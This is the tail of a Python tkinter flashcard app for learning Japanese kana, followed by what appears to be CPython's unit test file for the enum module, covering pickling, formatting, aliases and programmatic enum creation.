audio_button = tk.Button(
self, image=self.audio_image, command=self.play_audio)
quit_button = tk.Button(
self, text="Quit", font=FONT, command=self.quit)
learn_button = tk.Button(
self, text="Learn", font=FONT, command=self.learn)
next_button = tk.Button(
self, text="Next", font=FONT, command=self.next)
canvas.grid(rowspan=2, columnspan=2, padx=4, pady=4, sticky="nsew")
show_button.grid(row=0, column=2, padx=4, pady=4)
audio_button.grid(row=2, column=0, padx=4, pady=4)
quit_button.grid(row=3, column=0, padx=4, pady=4, sticky="w")
learn_button.grid(row=3, column=1, padx=4, pady=4)
next_button.grid(row=3, column=2, padx=4, pady=4, sticky="e")
self.widgets["canvas"] = canvas
self.widgets["show_button"] = show_button
self.widgets["stroke_gif"] = stroke_gif
self.widgets["char_still"] = char_still
self.widgets["audio_button"] = audio_button
def take_focus(self):
self.app.pack_slaves()[-1].pack_forget()
self.app.ins_var.set(self.instructions)
self._load_next_kana()
self.pack(fill=tk.BOTH, expand=1)
def show(self):
"""Displays the character gif and still image."""
self.widgets["show_button"].grid_remove()
self.widgets["stroke_gif"].grid(row=0, column=2, padx=4, pady=4)
self.widgets["char_still"].grid(row=1, column=2, padx=4, pady=4)
def play_audio(self):
t = Thread(target=playsound, args=(self.audio_path,))
try:
t.start()
except PlaysoundException:
print(f">>> No audio for "
"'{SESS_SETTINGS['kana'][SESS_SETTINGS['index']][0]}'...")
def quit(self):
self._cleanup()
self.app.windows["setup"].take_focus()
def learn(self):
"""Switch session from quizzing to learning."""
self._cleanup()
SESS_SETTINGS["mode"] = "learn"
self.app.windows["learn"].take_focus()
def next(self):
"""Move on to the next kana."""
self._cleanup()
SESS_SETTINGS["index"] += 1
if SESS_SETTINGS["mode"] == "both":
next_window = choice(["speak", "write"])
else:
next_window = "write"
if next_window == "write":
self._load_next_kana()
else:
self.app.windows[next_window].take_focus()
|
test_enum.py
|
import enum
import doctest
import inspect
import os
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto
from enum import STRICT, CONFORM, EJECT, KEEP, _simple_enum, _test_simple_enum
from enum import verify, UNIQUE, CONTINUOUS, NAMED_FLAGS
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
python_version = sys.version_info[:2]
def load_tests(loader, tests, ignore):
tests.addTests(doctest.DocTestSuite(enum))
if os.path.exists('Doc/library/enum.rst'):
tests.addTests(doctest.DocFileSuite(
'../../Doc/library/enum.rst',
optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE,
))
return tests
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
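# Both helpers exercise every pickle protocol (0..HIGHEST_PROTOCOL); e.g.
# test_pickle_dump_load(self.assertIs, Stooges.CURLY) asserts that the
# unpickled object is the very same member object, not merely an equal one.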
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
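# Illustrative (hypothetical) use with an Enum: because classproperty defines
# __get__, it is treated as a descriptor rather than a member, so it can
# expose computed data on the class itself.
#
#     class Color(Enum):
#         RED = 1
#         @classproperty
#         def member_count(cls):
#             return len(cls.__members__)
#
#     Color.member_count  # -> 1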
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), season)
self.assertEqual(repr(e), 'Season.{0}'.format(season))
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
                _create_ = 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
3 in Season
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
@unittest.skipIf(
python_version < (3, 12),
        '__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
self.assertTrue(3 in Season)
self.assertFalse('AUTUMN' in Season)
val = Season(3)
self.assertIn(val, Season)
#
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
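        # Iteration skips aliases (FALL, ANOTHER_SPRING), but __members__
        # still maps the alias names to their canonical members.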
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
def test_reserved__sunder_(self):
with self.assertRaisesRegex(
ValueError,
'_sunder_ names, such as ._bad_., are reserved',
):
class Bad(Enum):
_bad_ = 1
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
@unittest.skipIf(
python_version < (3, 12),
'mixin-format is still using member.value',
)
def test_mixin_format_warning(self):
with self.assertWarns(DeprecationWarning):
self.assertEqual(f'{self.Grades.B}', 'Grades.B')
@unittest.skipIf(
python_version >= (3, 12),
'mixin-format now uses member instead of member.value',
)
def test_mixin_format_warning(self):
with self.assertWarns(DeprecationWarning):
self.assertEqual(f'{self.Grades.B}', '4')
def assertFormatIsValue(self, spec, member):
if python_version < (3, 12) and (not spec or spec in ('{}','{:}')):
with self.assertWarns(DeprecationWarning):
self.assertEqual(spec.format(member), spec.format(member.value))
else:
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
        self.assertEqual(format(Test2Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
def __repr__(self):
return '<%s.%s: %r>' % (self.__class__.__name__, self._name_, self._value_)
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
#
class SillyInt(HexInt):
__qualname__ = 'SillyInt'
pass
class MyOtherEnum(SillyInt, enum.Enum):
__qualname__ = 'MyOtherEnum'
D = 4
E = 5
F = 6
self.assertIs(MyOtherEnum._member_type_, SillyInt)
globals()['SillyInt'] = SillyInt
globals()['MyOtherEnum'] = MyOtherEnum
test_pickle_dump_load(self.assertIs, MyOtherEnum.E)
test_pickle_dump_load(self.assertIs, MyOtherEnum)
#
# This did not work in 3.9, but does now with pickling by name
class UnBrokenInt(int):
__qualname__ = 'UnBrokenInt'
def __new__(cls, value):
return int.__new__(cls, value)
class MyUnBrokenEnum(UnBrokenInt, Enum):
__qualname__ = 'MyUnBrokenEnum'
G = 7
H = 8
I = 9
self.assertIs(MyUnBrokenEnum._member_type_, UnBrokenInt)
self.assertIs(MyUnBrokenEnum(7), MyUnBrokenEnum.G)
globals()['UnBrokenInt'] = UnBrokenInt
globals()['MyUnBrokenEnum'] = MyUnBrokenEnum
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum.I)
test_pickle_dump_load(self.assertIs, MyUnBrokenEnum)
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited_methods(self):
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
self.assertEqual(phy.pi.upper(), 'PI')
self.assertEqual(phy.tau.count('a'), 1)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_global_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
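        # Returning a bare string from __reduce_ex__ tells pickle to store
        # the object as a named global, so members are re-imported by name on
        # unpickling instead of being rebuilt from their values.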
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
